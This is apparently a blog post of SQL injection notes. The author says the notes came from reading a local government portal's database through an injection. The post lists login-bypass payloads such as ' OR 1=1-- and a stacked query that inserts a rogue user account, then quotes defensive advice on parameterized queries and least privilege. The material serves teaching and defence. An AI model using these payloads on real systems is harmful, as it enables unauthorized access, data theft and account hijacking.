SQL injection via form input
I recently logged into an information query system on a local government portal and found that a simple SQL injection was enough to read information straight out of the database. I was shocked! I won't say which site it was...
I searched around online and am saving some notes here for reference.
1. Building a simple SQL injection login
Username input: test' or ''='
Password input: ' or ''='
or
Username input: test
Password input: ' or ''='

Making the SQL Injection Requests
Now onto the fun part. Let's say we have a user 'Foo' with password 'foo' in our Users table for the purpose of this exercise.
1. Trying an invalid user/password.

2. Bypassing login for a known user. Let's say we know user 'Foo' exists.
Username: Foo'--
Password: junk

By using '--' for commenting out the rest of the conditions in the query we have been able to skip password validation for user 'Foo'
3. Bypassing login for unknown user. Let's say we don't know any user on the site.
Username: ' OR 1=1--
Password: junk

We used a tautology (1=1) to bypass all security checks. Notice that I now have the order information for *all* users.
4. Injecting a new user. Let's say I want to add a user 'Hijack' with password 'This'.
Username: ';INSERT INTO Users VALUES (100,'Hijack','This')--
Password: junk

But now using those credentials succeeds.

By this point I was about to break down!
Think about the sites I've built myself... ⊙﹏⊙b (sweat)
Finally, the foreign author gives some advice; take a look:
Conclusion
It is quite easy to see how quickly one can invade a system through the use of SQL injection. The million dollar question is "How do I protect myself?" The answer is, follow best practices.
- Sanitize your input using both black lists and white lists.
- Use parameterized SQL and NEVER use string concatenation to generate queries.
- Protect your database resources wisely and use the notion of "least privilege" to access information.
Hope this helped in making SQL injection a more concrete issue to protect your applications against, rather than a buzz word.
References:
SQL Injection Cheat Sheet (Part 1)
http://drops.wooyun.org/tips/7840
http://blogs.iis.net/nazim/sql-injection-demo
http://www.unixwiz.net/techtips/sql-injection.html
浙公网安备 33010602011771号